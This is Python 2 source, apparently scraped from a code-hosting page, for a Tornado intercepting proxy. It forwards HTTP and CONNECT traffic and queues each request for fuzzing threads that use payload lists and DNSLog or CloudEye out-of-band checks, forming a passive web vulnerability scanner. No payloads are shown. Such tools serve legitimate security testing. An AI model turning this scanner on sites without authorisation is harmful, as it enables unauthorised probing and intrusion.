for i in range(0, int(fuzz_count)):
|
||||||
|
cifz = CIF_Fuzz(queue=queue)
|
||||||
|
cifz.fuzzing_payloads_list = PayloadME.fuzzing_payloads_list
|
||||||
|
cifz.CheckKey_list = checkkey_list
|
||||||
|
cifz.my_cloudeye = my_cloudeye
|
||||||
|
cifz.url_ext_blacklist = url_ext_black.split(",")
|
||||||
|
cifz.dnslog_sessionid = dnslog_sessionid
|
||||||
|
cifz.Logfile = Logfile
|
||||||
|
cifz.custom_domain = custom_domain
|
||||||
|
cifz.white_site = white_site.split(",")
|
||||||
|
cifz.black_site = black_site.split(",")
|
||||||
|
cifz.timeout = int(timeout)
|
||||||
|
cifz.start()
|
||||||
|
print "[+] Everything is ready."
|
||||||
|
@tornado.web.asynchronous
|
||||||
|
def get(self):
|
||||||
|
def handle_response(response):
|
||||||
|
if (response.error and not
|
||||||
|
isinstance(response.error, tornado.httpclient.HTTPError)):
|
||||||
|
self.set_status(500)
|
||||||
|
self.write('Internal server error:\n' + str(response.error))
|
||||||
|
else:
|
||||||
|
self.set_status(response.code, response.reason)
|
||||||
|
self._headers = tornado.httputil.HTTPHeaders() # clear tornado default header
|
||||||
|
|
||||||
|
for header, v in response.headers.get_all():
|
||||||
|
if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'):
|
||||||
|
self.add_header(header, v) # some header appear multiple times, eg 'Set-Cookie'
|
||||||
|
|
||||||
|
if response.body:
|
||||||
|
self.set_header('Content-Length', len(response.body))
|
||||||
|
self.write(response.body)
|
||||||
|
self.finish()
|
||||||
|
|
||||||
|
body = self.request.body
|
||||||
|
if not body:
|
||||||
|
body = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
|
||||||
|
if 'Proxy-Connection' in self.request.headers:
|
||||||
|
del self.request.headers['Proxy-Connection']
|
||||||
|
|
||||||
|
fetch_request(
|
||||||
|
self.request.uri, handle_response,
|
||||||
|
method=self.request.method, body=body,
|
||||||
|
headers=self.request.headers, follow_redirects=False,
|
||||||
|
allow_nonstandard_methods=True)
|
||||||
|
|
||||||
|
request_dict = {}
|
||||||
|
request_dict['uri'] = self.request.uri
|
||||||
|
request_dict['method'] = self.request.method
|
||||||
|
request_dict['headers'] = self.request.headers
|
||||||
|
request_dict['body'] = body
|
||||||
|
self.queue.put(request_dict)
|
||||||
|
|
||||||
|
except tornado.httpclient.HTTPError as e:
|
||||||
|
if hasattr(e, 'response') and e.response:
|
||||||
|
handle_response(e.response)
|
||||||
|
else:
|
||||||
|
self.set_status(500)
|
||||||
|
self.write('Internal server error:\n' + str(e))
|
||||||
|
self.finish()
|
||||||
|
|
||||||
|
@tornado.web.asynchronous
|
||||||
|
def post(self):
|
||||||
|
return self.get()
|
||||||
|
|
||||||
|
@tornado.web.asynchronous
|
||||||
|
def options(self):
|
||||||
|
return self.get()
|
||||||
|
|
||||||
|
@tornado.web.asynchronous
|
||||||
|
def connect(self):
|
||||||
|
host, port = self.request.uri.split(':')
|
||||||
|
client = self.request.connection.stream
|
||||||
|
|
||||||
|
def read_from_client(data):
|
||||||
|
upstream.write(data)
|
||||||
|
|
||||||
|
def read_from_upstream(data):
|
||||||
|
client.write(data)
|
||||||
|
|
||||||
|
def client_close(data=None):
|
||||||
|
if upstream.closed():
|
||||||
|
return
|
||||||
|
if data:
|
||||||
|
upstream.write(data)
|
||||||
|
upstream.close()
|
||||||
|
|
||||||
|
def upstream_close(data=None):
|
||||||
|
if client.closed():
|
||||||
|
return
|
||||||
|
if data:
|
||||||
|
client.write(data)
|
||||||
|
client.close()
|
||||||
|
|
||||||
|
def start_tunnel():
|
||||||
|
client.read_until_close(client_close, read_from_client)
|
||||||
|
upstream.read_until_close(upstream_close, read_from_upstream)
|
||||||
|
client.write(b'HTTP/1.0 200 Connection established\r\n\r\n')
|
||||||
|
|
||||||
|
def on_proxy_response(data=None):
|
||||||
|
if data:
|
||||||
|
first_line = data.splitlines()[0]
|
||||||
|
http_v, status, text = first_line.split(None, 2)
|
||||||
|
if int(status) == 200:
|
||||||
|
start_tunnel()
|
||||||
|
return
|
||||||
|
|
||||||
|
self.set_status(500)
|
||||||
|
self.finish()
|
||||||
|
|
||||||
|
def start_proxy_tunnel():
|
||||||
|
upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri)
|
||||||
|
upstream.write('Host: %s\r\n' % self.request.uri)
|
||||||
|
upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n')
|
||||||
|
upstream.read_until('\r\n\r\n', on_proxy_response)
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
|
||||||
|
upstream = tornado.iostream.IOStream(s)
|
||||||
|
|
||||||
|
proxy = get_proxy(self.request.uri)
|
||||||
|
if proxy:
|
||||||
|
proxy_host, proxy_port = parse_proxy(proxy)
|
||||||
|
upstream.connect((proxy_host, proxy_port), start_proxy_tunnel)
|
||||||
|
else:
|
||||||
|
upstream.connect((host, int(port)), start_tunnel)
|
||||||
|
|
||||||
|
|
||||||
|
class RunProxyThread(threading.Thread):
|
||||||
|
def __init__(self, handler, host, port):
|
||||||
|
self.host = host
|
||||||
|
self.port = port
|
||||||
|
self.handler = handler
|
||||||
|
threading.Thread.__init__(self)
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
ProxyManage().run_proxy(self.host, self.port, self.handler)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
port = 8888
|
||||||
|
if len(sys.argv) > 1:
|
||||||
|
port = int(sys.argv[1])
|
||||||
|
print "[*] Starting HTTP proxy at: http://127.0.0.1:%d" % port
|
||||||
|
|
||||||
|
RunProxyThread(ProxyHandler, '127.0.0.1', int(port)).run()
|
||||||
|
|
||||||
Reference in New Issue
Block a user